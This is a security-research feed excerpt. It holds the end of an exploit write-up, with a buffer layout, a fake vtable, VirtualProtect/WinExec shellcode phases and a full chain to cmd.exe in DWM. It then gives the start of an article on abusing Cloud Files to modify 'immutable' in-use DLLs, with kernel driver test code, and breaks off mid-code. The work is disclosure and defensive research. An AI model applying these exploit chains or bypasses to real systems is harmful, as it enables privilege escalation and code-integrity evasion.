<td align="left">fixup table (8 entries)</td>
<td align="left">Offsets to patch</td>
</tr>
<tr>
<td align="left">+0x78</td>
<td align="left">8</td>
<td align="left">base+0xC8 (fixup'd)</td>
<td align="left">[this-8] → fake_obj_1</td>
</tr>
<tr>
<td align="left">+0x80</td>
<td align="left">8</td>
<td align="left">(unused)</td>
<td align="left">Disconnect <code>this</code> base</td>
</tr>
<tr>
<td align="left">+0x90</td>
<td align="left">8</td>
<td align="left">base+0xA0 (fixup'd)</td>
<td align="left">[this+0x10] → fake_obj_2</td>
</tr>
<tr>
<td align="left">+0xA0</td>
<td align="left">8</td>
<td align="left">base+0xA8 (fixup'd)</td>
<td align="left">fake_obj_2 vtable</td>
</tr>
<tr>
<td align="left">+0xB8</td>
<td align="left">8</td>
<td align="left">base+0xD0 (fixup'd)</td>
<td align="left">vtable_2[0x10] → shellcode</td>
</tr>
<tr>
<td align="left">+0xC0</td>
<td align="left">4</td>
<td align="left">(output)</td>
<td align="left">VirtualProtect <code>lpflOldProtect</code></td>
</tr>
<tr>
<td align="left">+0xC8</td>
<td align="left">8</td>
<td align="left">base+0xC8 (fixup'd)</td>
<td align="left">Self-referential vtable (fake_obj_1)</td>
</tr>
<tr>
<td align="left">+0xD0</td>
<td align="left">22</td>
<td align="left">shellcode phase 1</td>
<td align="left">Save regs, load WinExec, jmp</td>
</tr>
<tr>
<td align="left">+0xE8</td>
<td align="left">8</td>
<td align="left">&amp;VirtualProtect</td>
<td align="left">vtable_1[0x20] data</td>
</tr>
<tr>
<td align="left">+0xF0</td>
<td align="left">48</td>
<td align="left">shellcode phase 2</td>
<td align="left">WinExec + defuse + stack fixup + &quot;cmd.exe\0&quot;</td>
</tr>
</tbody>
</table>
<h3>Full Chain Summary</h3>
<pre><code>DirtyActiveInk iterates dangling pointer
  → [[spray+0x00]+0x50] = __fnINSTRING(spray)
    → FixupCallbackPointers: 8 relative offsets → absolute
    → Dispatch: CStdAsyncStubBuffer2_Disconnect(base+0x80, 0x1000, 0x40, base+0xC0)
      → Vtable call #1: VirtualProtect(base+0xC8, 0x1000, RWX, base+0xC0)
        → Spray buffer page is now RWX, CFG bitmap updated
      → Vtable call #2: shellcode at base+0xD0
        → WinExec(&quot;cmd.exe&quot;, SW_SHOW)
        → Defuse: rewrite vtable for safe re-entry
        → Stack fixup: add rsp, 0xB8 to skip Disconnect + __fnINSTRING frames
      → RET directly to DWM composition loop
    → DirtyActiveInk re-entry: [[base]+0x50] = ret → clean return
</code></pre>
<p>The DWM process runs as the DWM user with System integrity. Prior <a href="https://ti.qianxin.com/blog/articles/public-secret-research-on-the-cve-2024-30051-privilege-escalation-vulnerability-in-the-wild-en/">public techniques</a> to achieve SYSTEM typically involve hijacking function pointers mapped into privileged client processes like LogonUI or Consent. However, it appears this technique was recently patched as the shared section is now mapped read-only. We developed a new, alternative path to SYSTEM but are choosing to withhold publishing the technique at this time.</p>
&lt;div className=&quot;youtube-video-container&quot;&gt;
  &lt;iframe src=&quot;https://www.youtube.com/embed/SR4242l_kw0?si=lIQFQ8xThl_Nmt0w&quot; title=&quot;YouTube video player&quot; allow=&quot;fullscreen; accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot; referrerPolicy=&quot;strict-origin-when-cross-origin&quot; allowFullScreen&gt;&lt;/iframe&gt;
&lt;/div&gt;
<h2>Closing Thoughts</h2>
<p>The models we have today are highly capable at tasks that historically have required deep expertise cultivated over many years. This includes things like reverse engineering, vulnerability discovery, and exploit development. Their capabilities are spiky, and do not yet rival the world's best in these fields. However, the march of model progress seems to show no sign of slowing down at the moment. This levels the playing field for defenders, but also raises the capabilities of attackers. While there has always been an adversarial cat and mouse game, and this is not new in that regard, attackers are at least at a near-term asymmetric advantage to wield these tools for harm. Attackers can move faster, with little worry about safety or security of AI systems. Defenders must leverage AI for offensive purposes against their code (for vulnerabilities), security products (for detection gaps), and their enterprises (adversary emulation) to find weaknesses and iterate on improved defenses before attackers do. Unfortunately, it may be the small organizations with no security teams that take the brunt of the near term pain. My hope is that long-term, the security community can together outspend attackers on offensive and defensive research, and we exit this era in a better place than we started.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/patch-diff-to-system/patch-diff-to-system.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[The Immutable Illusion: Pwning Your Kernel with Cloud Files]]></title>
            <link>https://www.elastic.co/kr/security-labs/immutable-illusion</link>
            <guid>immutable-illusion</guid>
            <pubDate>Fri, 20 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Threat actors can abuse a class of vulnerabilities to bypass security restrictions and break trust chains.]]></description>
            <content:encoded><![CDATA[<p>In 2024, we disclosed a new Windows vulnerability class, <a href="https://www.elastic.co/kr/security-labs/false-file-immutability">False File Immutability</a> (FFI), which previously demonstrated how <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/what-is-a-network-redirector-">network redirectors</a> could be leveraged to violate incorrect assumptions in the design of Windows Code Integrity, resulting in a pair of kernel exploits. These exploits relied on Windows network drives, adding complexity and creating a choke-point in the kill chain that allowed for easier detection and mitigation.</p>
<p>This research presents an advancement by introducing a more streamlined and self-contained method of exploitation. The novel approach leverages a built-in Windows capability to achieve the same file modification bypass, without the complexities of SMB setups. By analyzing how the kernel driver for this capability processes file data, we uncover a security bypass that enables an attacker to modify files that Windows incorrectly assumes are immutable, leading to a proof-of-concept kernel exploit.</p>
<p>Key Takeaways:</p>
<ul>
<li><strong>No Network Redirector Needed:</strong> Unlike prior exploits, the new exploitation method exploits False File Immutability without requiring the use of Windows file sharing.</li>
<li><strong>Built-in Capability Exploited:</strong> The exploit leverages a security bypass within a built-in Windows capability that handles cloud file synchronization.</li>
<li><strong>Immutability Violated:</strong> It enables modification of files that the Windows kernel and memory manager incorrectly assume are immutable, leading to a kernel exploit.</li>
<li><strong>Mitigation Bypassed:</strong> It enables attackers to bypass a mitigation that Microsoft created specifically for a prior FFI exploit.</li>
<li><strong>Forever-Day:</strong> Microsoft chose to only patch this exploit in some versions of Windows, so it remains functional on several fully-patched versions of Windows in <a href="https://learn.microsoft.com/en-us/lifecycle/policies/fixed#mainstream-support">Mainstream Support</a> as of February 2026.</li>
</ul>
<h2>False file immutability</h2>
<p><em>You may remember False File Immutability from <a href="https://www.elastic.co/kr/security-labs/false-file-immutability">our recent article</a> and <a href="https://www.youtube.com/watch?v=1LvOFU1u-eo">BlueHat IL 2024 talk</a>, but if not, then this section should help refresh your memory. If you’re already familiar, feel free to skip to the next section.</em></p>
<p>When an application opens a file on Windows, it typically uses some form of the Win32 <a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew">CreateFile</a> API.</p>
<pre><code class="language-c">HANDLE CreateFileW(
  [in]           LPCWSTR               lpFileName,
  [in]           DWORD                 dwDesiredAccess,
  [in]           DWORD                 dwShareMode,
  [in, optional] LPSECURITY_ATTRIBUTES lpSecurityAttributes,
  [in]           DWORD                 dwCreationDisposition,
  [in]           DWORD                 dwFlagsAndAttributes,
  [in, optional] HANDLE                hTemplateFile
);
</code></pre>
<p>Callers of <code>CreateFile</code> specify the access they want in <code>dwDesiredAccess</code>. For example, a caller would pass <code>FILE_READ_DATA</code> to be able to read data, or <code>FILE_WRITE_DATA</code> to be able to write data. The full set of access rights are <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/file-access-rights-constants">documented</a> on the Microsoft Learn website.</p>
<p>In addition to passing <code>dwDesiredAccess</code>, callers must pass a “sharing mode” in <code>dwShareMode</code>, which consists of zero or more of <code>FILE_SHARE_READ</code>, <code>FILE_SHARE_WRITE</code>, and <code>FILE_SHARE_DELETE</code>. You can think of a sharing mode as the caller declaring “I’m okay with others doing X to this file while I’m using it,” where X could be reading, writing, or renaming. For example, a caller that passes <code>FILE_SHARE_WRITE</code> allows others to write the file while they are working with it.</p>
<p>As a file is opened, the caller’s <code>dwDesiredAccess</code> is tested against the <code>dwShareMode</code> of all existing file handles. Simultaneously, the caller’s <code>dwShareMode</code> is tested against the previously-granted <code>dwDesiredAccess</code> of all existing handles to that file. If either of these tests fails, then CreateFile fails with a sharing violation.</p>
<p>Sharing isn’t mandatory. Callers can pass a share mode of zero to obtain exclusive access. Per Microsoft <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/creating-and-opening-files">documentation</a>:</p>
<blockquote>
<p>An open file that is not shared (<code>dwShareMode</code> set to zero) cannot be opened again, either by the application that opened it or by another application, until its handle has been closed. This is also referred to as exclusive access.</p>
</blockquote>
<p>Sharing is enforced by the filesystem, typically NTFS, but Windows supports other filesystems such as FAT32. Windows itself omits <code>FILE_SHARE_WRITE</code> when opening certain types of files, preventing modification while they are in use. Such unmodifiable files can be considered <a href="https://www.merriam-webster.com/dictionary/immutable"><strong>immutable</strong></a>.</p>
<p>In some situations, the memory manager relies on this immutability. If a page fault occurs within an immutable memory-mapped file, and that page hasn’t been modified, then the memory manager can read that page’s contents directly out of the original backing file. It needn’t save a second copy of the file’s contents to the <a href="https://learn.microsoft.com/en-us/troubleshoot/windows-client/performance/introduction-to-the-page-file">pagefile</a> because immutability ensures that the file on disk cannot be changed. Executables running in memory, such as EXEs and DLLs, are immutable, so the memory manager can apply this optimization to them.</p>
<p><a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/what-is-a-network-redirector-">Network redirectors</a> allow the use of network paths with any API that accepts file paths. This is very convenient, allowing users and applications to easily work with files and run programs off network drives. The kernel transparently redirects any I/O to the remote machine. If a program is launched from a network drive, any EXEs and its DLLs will be transparently pulled from the network as needed.</p>
<p>When a network redirector is in use, the server on the other end of the pipe needn’t be a Windows machine. It could be a Linux machine running <a href="https://en.wikipedia.org/wiki/Samba_(software)">Samba</a>, or even a Python <a href="https://github.com/fortra/impacket/blob/d71f4662eaf12c006c2ea7f5ec09b418d9495806/examples/smbserver.py">Impacket script</a> that “speaks” the <a href="https://learn.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview">SMB network protocol</a>. This means the server doesn’t have to honor Windows filesystem sharing semantics. An attacker can employ a network redirector to modify “immutable” files server-side, bypassing sharing restrictions. This means that these files are incorrectly assumed to be immutable. This is a vulnerability class that we are calling <strong>False File Immutability</strong> (FFI).</p>
<h2>Cloud files</h2>
<p>Imagine leaving the house to start your day, and there’s a package on your step. It’s that sweet Surface Book you ordered last week. Excited but short on time, you throw it into your bag and head to the gym. After working out to sick beats on your Zune, you head to the local Redmond coffee shop to meet up with a friend you met on Xbox Live. Unfortunately, they’re running late, so you crack open your brand new Surface Book and log into Windows, eager to set up Recall. Despite the mediocre coffee shop Wi-Fi, somehow your entire 1TB OneDrive immediately appears before you. There’s no way you could have downloaded 1TB that quickly, so there must be some witchcraft going on. That witchcraft is <a href="https://learn.microsoft.com/en-us/windows/win32/cfapi/cloud-files-api-portal">Cloud Files</a>.</p>
<p>Introduced in Windows 10 version 1709, Cloud Files enables user-mode applications like OneDrive to register as <a href="https://learn.microsoft.com/en-us/windows/win32/cfapi/build-a-cloud-file-sync-engine">Cloud Sync Providers</a> and create empty “placeholder” files on the system. Initially, these placeholders are dehydrated (empty). As you access them, the I/O is intercepted by the CloudFiles kernel driver (<code>cldflt.sys</code>), which calls into the provider’s process. The provider can then retrieve the file’s contents from the cloud. It doesn't need to download the entire file at once. If you only need 1MB, it can retrieve just that 1MB. As you request more of the file, it can continue to rehydrate (fill in) the file contents as needed.</p>
<p>When the driver needs to rehydrate a file, it invokes a <a href="https://learn.microsoft.com/en-us/windows/win32/api/cfapi/ns-cfapi-cf_callback_registration">rehydration callback</a> in the provider’s process (i.e. <code>OneDrive.exe</code>). That callback retrieves the file’s contents (potentially from the cloud) and calls <code>CfExecute</code> to give those contents to the driver, which the driver then writes to the file. CloudFiles will only request rehydration of file regions that aren’t currently hydrated, but it’s possible to <a href="https://learn.microsoft.com/en-us/previous-versions/mt827480(v=vs.85)">dehydrate</a> files to free up space on the current system.</p>
<h2>Exploit development</h2>
<p>By default, Windows allows for the sharing of files and folders over the network using the Server Message Block (SMB) protocol. If you’ve ever connected to a shared network drive on a corporate network, there’s a good chance that it used SMB. Windows includes both an SMB client and server by default. The client component provides a network redirector, as described above, enabling transparent SMB access to files via any API that accepts file paths. For example, you can run Process Monitor over the internet right now by running <code>\\live.sysinternals.com\Procmon.exe</code>.</p>
<p>We released the <a href="https://github.com/gabriellandau/PPLFault">PPLFault exploit</a> in May 2023 alongside our <a href="https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052">Black Hat Asia talk</a>. PPLFault leverages a network redirector to exploit FFI in DLLs loaded into Protected Process Light (PPL) processes. The initial prototype required a second attacker-controlled machine running a malicious SMB server. By disabling Windows’ built-in SMB server, we were able to move the malicious SMB server to the local machine, removing the requirement for a second machine (<a href="https://github.com/gabriellandau/PPLFault/tree/main/python">prototype</a>).</p>
<p>This was still messier than we would like, however, because at the time we <a href="https://www.x33fcon.com/slides/x33fcon24_-_Nick_Powers_-_Relay_Your_Heart_Away_An_OPSEC-Conscious_Approach_to_445_Takeover.pdf">incorrectly</a> believed that stopping the Windows built-in SMB server required a reboot. Fortunately, we discovered James Forshaw’s technique of <a href="https://googleprojectzero.blogspot.com/2021/01/windows-exploitation-tricks-trapping.html">combining the CloudFiles provider with the loopback (localhost) SMB adapter</a>, enabling us to create the final reboot-less exploit. Besides being streamlined, the CloudFiles/SMB pairing is distinct from the prior two exploit versions in that it uses the regular Windows SMB server, which should honor file sharing (i.e. <code>FILE_SHARE_*</code>) semantics. For example, while an SMB client has a file open on a server without <code>FILE_SHARE_WRITE</code>, the server shouldn’t allow another client to open that file for write access. Similarly, the server shouldn’t allow write access to any executables running locally on the server.</p>
<p>We seem to have a contradiction. If PPLFault has to abide by file sharing restrictions, then how is it injecting code into a running DLL?  Let’s see what <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/procmon">Process Monitor</a> can tell us. Running PPLFault under Process Monitor shows the following three operations (filtered for illustrative purposes). This analysis was done with <a href="https://www.virustotal.com/gui/file/69ae0580eacf97afc52d87e74118571d18cfd266d00a7d579d5419720c5713da">version 10.0.22621.2861</a> of <code>cldflt.sys</code> on Windows 11 22631.2861.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/immutable-illusion/image4.png" alt="" /></p>
<p>In order, the operations are:</p>
<ol>
<li>The victim process, <code>services.exe</code>, loads a DLL as an executable image.</li>
<li>After it’s loaded, <code>PPLFault.exe</code> open it.</li>
<li>After it’s opened, <code>PPLFault.exe</code> writes to it.</li>
</ol>
<p>There are a few key observations to make here:</p>
<p><strong>Violation of Immutability</strong><br />
We see a successful write operation to a file while it is loaded as an executable image. In our <a href="https://www.elastic.co/kr/security-labs/false-file-immutability">earlier FFI research</a>, we discussed the <code>MmFlushImageSection</code> check in the file system, which is designed to protect against this very situation. <em>How did it bypass this check?</em></p>
<p><strong>Violation of the File Access Model</strong><br />
We can see that PPLFault successfully overwrote the file. Microsoft documentation for WriteFile <a href="https://learn.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefile">states</a> that the file should have been opened with write access, meaning <a href="https://learn.microsoft.com/en-us/windows/win32/fileio/file-access-rights-constants"><code>FILE_WRITE_DATA</code></a>, but the output shows it was opened for “Read Attributes, Write Attributes, Synchronize,” which is <code>FILE_READ_ATTRIBUTES</code>, <code>FILE_WRITE_ATTRIBUTES</code>, and <code>SYNCHRONIZE</code>. <em>Without <code>FILE_WRITE_DATA</code>, how did it overwrite this file?</em></p>
<p>Let’s try to answer these two questions in the next section.</p>
<blockquote>
<p>📘 Nerd Bonus -</p>
<p>Process Monitor installs a <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/filter-manager-concepts">filesystem minifilter driver</a> to intercept and log I/O activity on the system. Windows encapsulates I/O actions in structures called <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/i-o-request-packets">I/O Request Packets</a> (IRPs). Each minifilter is <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes">assigned</a> an “altitude,” which you can think of as floors in a building. Most IRPs start at the top floor and travel down the stack. If a minifilter issues its own I/O, that IRP starts at its altitude and travels downwards from there. In other words, a minifilter on the sixth floor will never see I/O from the fifth floor. Process Monitor’s minifilter driver runs at altitude <code>385200</code>. Normally, it will never see the activity of <code>cldflt.sys</code>, which runs at altitude <code>180451</code>. Fortunately, we can adjust Process Monitor’s altitude with the <a href="https://x.com/GabrielLandau/status/1651685087769948170">/altitude switch</a>, placing it below CloudFiles at altitude <code>180450</code>.</p>
</blockquote>
<h2>Rules for thee, but not for me</h2>
<p>As discussed, applications are subject to file sharing restrictions, but the kernel itself isn’t always restricted in the same way. For example, kernel drivers can use <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-iocreatefileex">IoCreateFileEx</a> to open or create files.</p>
<pre><code class="language-c">NTSTATUS IoCreateFileEx(
  [out]          PHANDLE                   FileHandle,
  [in]           ACCESS_MASK               DesiredAccess,
  [in]           POBJECT_ATTRIBUTES        ObjectAttributes,
  [out]          PIO_STATUS_BLOCK          IoStatusBlock,
  [in, optional] PLARGE_INTEGER            AllocationSize,
  [in]           ULONG                     FileAttributes,
  [in]           ULONG                     ShareAccess,
  [in]           ULONG                     Disposition,
  [in]           ULONG                     CreateOptions,
  [in, optional] PVOID                     EaBuffer,
  [in]           ULONG                     EaLength,
  [in]           CREATE_FILE_TYPE          CreateFileType,
  [in, optional] PVOID                     InternalParameters,
  [in]           ULONG                     Options,
  [in, optional] PIO_DRIVER_CREATE_CONTEXT DriverContext
);
</code></pre>
<p><code>IoCreateFileEx</code> looks very similar to the user-facing function <code>NtCreateFile</code>, but its documentation describes some important additional capabilities, including its <code>Options</code> parameter, which supports a flag:</p>
<blockquote>
<p>IO_IGNORE_SHARE_ACCESS_CHECK<br />
The I/O manager should not perform share-access checks on the file object after it is created. However, the file system might still perform these checks.</p>
</blockquote>
<p>Is it that simple?  Can a kernel driver use <code>IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK)</code> to open an in-use DLL for write access?  Let’s write a kernel driver to try it out. The code in this article is available as a Visual Studio project on GitHub <a href="https://github.com/gabriellandau/BlogExamples/tree/main/Redux/FileTestDriver">here</a>.</p>
<pre><code class="language-c">/*
* This experiment shows that a file opened without FILE_SHARE_WRITE 
* can't be modified unless IO_IGNORE_SHARE_ACCESS_CHECK is used.
*/
VOID ExperimentOne()
{
    DECLARE_CONST_UNICODE_STRING(filePath, L&quot;\\??\\C:\\TestFile.bin&quot;);

    NTSTATUS ntStatus = STATUS_SUCCESS;
    HANDLE hFile = NULL;
    HANDLE hFile2 = NULL;
    OBJECT_ATTRIBUTES objAttr{};
    IO_STATUS_BLOCK iosb{};
    BOOLEAN bSuccessful = FALSE;
    BOOLEAN bReportResults = FALSE;

    InitializeObjectAttributes(&amp;objAttr, (PUNICODE_STRING)&amp;filePath, 
        OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

    // Create a file without FILE_SHARE_WRITE
    // This mimics ntdll!LdrpMapDllNtFileName
    ntStatus = ZwCreateFile(
        &amp;hFile,
        FILE_READ_DATA | FILE_EXECUTE | SYNCHRONIZE,
        &amp;objAttr, &amp;iosb, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_DELETE,
        FILE_OPEN_IF,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
        NULL, 0);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, 
            &quot;ExperimentOne: ZwCreateFile %wZ failed with NTSTATUS 0x%08x\n&quot;, 
            &amp;filePath, ntStatus);
        goto Cleanup;
    }

    bReportResults = TRUE;

    // IoCreateFileEx without IO_IGNORE_SHARE_ACCESS_CHECK should not be able to open the file
    ntStatus = IoCreateFileEx(
        &amp;hFile2,
        FILE_WRITE_DATA | SYNCHRONIZE,
        &amp;objAttr, &amp;iosb, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_OPEN,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
        NULL, 0, CreateFileTypeNone, NULL,
        0,
        NULL);
    if (NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentOne: IoCreateFileEx(FILE_WRITE_DATA) unexpectedly &quot;
            &quot;succeeded on a write-sharing-denied file\n&quot;);
        ntStatus = STATUS_UNSUCCESSFUL;
        goto Cleanup;
    }

    // Can IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) open a 
    // write-sharing-denied file for write access?
    ntStatus = IoCreateFileEx(
        &amp;hFile2,
        FILE_WRITE_DATA | SYNCHRONIZE,
        &amp;objAttr, &amp;iosb, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
        FILE_OPEN,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
        NULL, 0, CreateFileTypeNone, NULL,
        IO_IGNORE_SHARE_ACCESS_CHECK,
        NULL);
    bSuccessful = NT_SUCCESS(ntStatus);

Cleanup:
    if (bReportResults)
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentOne complete. &quot;
            &quot;IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) %s open a &quot;
            &quot;write-sharing-denied file for FILE_WRITE_DATA. &quot;
            &quot;Status: 0x%08x\n&quot;,
            bSuccessful ? &quot;CAN&quot; : &quot;CANNOT&quot;,
            ntStatus);
    }

    HandleDelete(hFile);
    HandleDelete(hFile2);
}
</code></pre>
<p>Loading it in a VM with <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/test-signing">test signing</a> enabled yields the following output:</p>
<pre><code class="language-c">ExperimentOne complete. IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) CAN open a write-sharing-denied file for FILE_WRITE_DATA. Status: 0x00000000
</code></pre>
<p>Did we just come up with a plausible explanation for how PPLFault can modify “immutable” files?  Not quite. This experiment was a bit of an over-simplification, but it shows <code>IO_IGNORE_SHARE_ACCESS_CHECK</code> in action, proving that kernel APIs can provide more freedom than their user-mode counterparts.</p>
<p>In PPLFault, CloudFiles isn’t just modifying a file with write-sharing-denied handles. Rather, it’s modifying a DLL while it’s mapped in memory as an executable image. Let’s try another experiment that’s a little closer to the PPLFault scenario. In experiment two, we will emulate <a href="https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryw"><code>LoadLibrary</code></a> by opening a DLL, creating a <code>SEC_IMAGE</code> section, and then mapping a view of that section into memory. Once the view is mapped, we will close the handles and test whether <code>IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK)</code> can get a writable handle.</p>
<p>Let’s start with a helper function that maps a PE as an image section, similar to <code>LoadLibrary</code>. We’ll do this in the kernel to keep the experiment in a single driver, but note that it’s functionally equivalent to <code>LoadLibrary</code> for our purposes.</p>
<pre><code class="language-c">// Emulate a portion of LoadLibrary
NTSTATUS MapFileAsImageSection(
    PCUNICODE_STRING pPath,
    HANDLE* phFile,
    HANDLE* phSection,
    PVOID* ppMappedBase
)
{
    NTSTATUS ntStatus = STATUS_SUCCESS;
    HANDLE hFile = NULL;
    HANDLE hSection = NULL;
    PVOID pMappedBase = NULL;
    SIZE_T viewSize = 0;
    OBJECT_ATTRIBUTES objAttr{};
    IO_STATUS_BLOCK iosb{};

    InitializeObjectAttributes(&amp;objAttr, (PUNICODE_STRING)pPath,
        OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

    // From ntdll!LdrpMapDllNtFileName
    // NtOpenFile(&amp;FileHandle, 0x100021u, &amp;ObjectAttributes, &amp;IoStatusBlock, 5u, 0x60u);
    ntStatus = ZwOpenFile(
        &amp;hFile,
        FILE_READ_DATA | FILE_EXECUTE | SYNCHRONIZE,
        &amp;objAttr, &amp;iosb,
        FILE_SHARE_READ | FILE_SHARE_DELETE,
        FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;MapFileAsImageSection: ZwCreateFile %wZ failed with NTSTATUS 0x%08x\n&quot;,
            pPath, ntStatus);
        goto Cleanup;
    }

    InitializeObjectAttributes(&amp;objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);

    // From ntdll!LdrpMapDllNtFileName
    // NtCreateSection(&amp;Handle, 0xDu, 0LL, 0LL, 0x10u, v18, FileHandle);
    ntStatus = ZwCreateSection(&amp;hSection,
        SECTION_QUERY | SECTION_MAP_READ | SECTION_MAP_EXECUTE,
        &amp;objAttr, NULL, PAGE_EXECUTE, SEC_IMAGE, hFile
    );
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;MapFileAsImageSection: ZwCreateSection %wZ failed with NTSTATUS 0x%08x\n&quot;,
            pPath, ntStatus);
        goto Cleanup;
    }

    // From ntdll!LdrpMinimalMapModule
    // Map a view of this SEC_IMAGE section into lower half of the the System process address space
    ntStatus = ZwMapViewOfSection(
        hSection, ZwCurrentProcess(), &amp;pMappedBase, 0, 0, NULL,
        &amp;viewSize, ViewShare, 0, PAGE_EXECUTE_WRITECOPY);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;MapFileAsImageSection: ZwMapViewOfSection %wZ failed with NTSTATUS 0x%08x\n&quot;,
            pPath, ntStatus);
        goto Cleanup;
    }

    // Move ownership to output parameters and prevent cleanup
    *ppMappedBase = pMappedBase;
    pMappedBase = NULL;

    *phFile = hFile;
    hFile = NULL;

    *phSection = hSection;
    hSection = NULL;

Cleanup:
    HandleDelete(hFile);
    HandleDelete(hSection);
    if (pMappedBase)
    {
        NTSTATUS unmapStatus = ZwUnmapViewOfSection(ZwCurrentProcess(), pMappedBase);
        NT_ASSERT(NT_SUCCESS(unmapStatus));
    }

    return ntStatus;
}
</code></pre>
<p>Now let’s use that helper to map a DLL, then see if we can write to it with <code>IO_IGNORE_SHARE_ACCESS_CHECK</code>:</p>
<pre><code class="language-c">/*
* This experiment shows that a file opened without FILE_SHARE_WRITE can't be 
* modified even if IO_IGNORE_SHARE_ACCESS_CHECK is used because the file has 
* an associated active SEC_IMAGE section.
*/
VOID ExperimentTwo()
{
    DECLARE_CONST_UNICODE_STRING(filePath, L&quot;\\SystemRoot\\System32\\TestDll.dll&quot;);

    NTSTATUS ntStatus = STATUS_SUCCESS;
    HANDLE hFile = NULL;
    HANDLE hSection = NULL;
    HANDLE hFile2 = NULL;
    OBJECT_ATTRIBUTES fileObjAttr{};
    OBJECT_ATTRIBUTES sectionObjAttr{};
    IO_STATUS_BLOCK iosb{};
    BOOLEAN bSuccessful = FALSE;
    BOOLEAN bReportResults = FALSE;
    PVOID pMappedBase = NULL;
    PFILE_OBJECT pFileObject = NULL;

    ntStatus = MapFileAsImageSection(
        &amp;filePath, &amp;hFile, &amp;hSection, &amp;pMappedBase);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentThree: MapFileAsImageSection %wZ failed with NTSTATUS 0x%08x\n&quot;,
            &amp;filePath, ntStatus);
        goto Cleanup;
    }

    // MmFlushImageSection should return FALSE. This is what fails the FILE_WRITE_DATA request below.
    // MmFlushImageSection requires SECTION_OBJECT_POINTERS, which we can get from the FILE_OBJECT.
    ntStatus = ObReferenceObjectByHandle(hFile, 0, *IoFileObjectType, KernelMode, (PVOID*)&amp;pFileObject, NULL);
    if (!NT_SUCCESS(ntStatus))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentThree: ObReferenceObjectByHandle %wZ failed with NTSTATUS 0x%08x\n&quot;,
            &amp;filePath, ntStatus);
        goto Cleanup;
    }

    if (MmFlushImageSection(pFileObject-&gt;SectionObjectPointer, MmFlushForWrite))
    {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL,
            &quot;ExperimentThree: MmFlushImageSection unexpectedly succeeded %wZ\n&quot;,
            &amp;filePath);
        goto Cleanup;
    }

    // Now that a view of the SEC_IMAGE mapping exists, close the file and section handles to remove them from the equation
    // We're trying to test whether IO_IGNORE_SHARE_ACCESS_CHECK can bypass the MmFlushImageSection check here:
    // https://github.com/Microsoft/Windows-driver-samples/blob/622212c3fff587f23f6490a9da939fb85968f651/filesys/fastfat/create.c#L3572-L3593
    ReferenceDelete(pFileObject);
    HandleDelete(hFile);
    HandleDelete(hSection);

    InitializeObjectAttributes(&amp;fileObjAttr, (PUNICODE_STRING)&amp;filePath, OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

    // Can IoCreateFileEx(IO_IGNORE_SHARE_ACCESS_CHECK) open a file mapped as SEC_IMAGE for write access?
    ntStatus = IoCreateFileEx(
        &amp;hFile2,
        FILE_WRITE_DATA | SYNCHRONIZE,
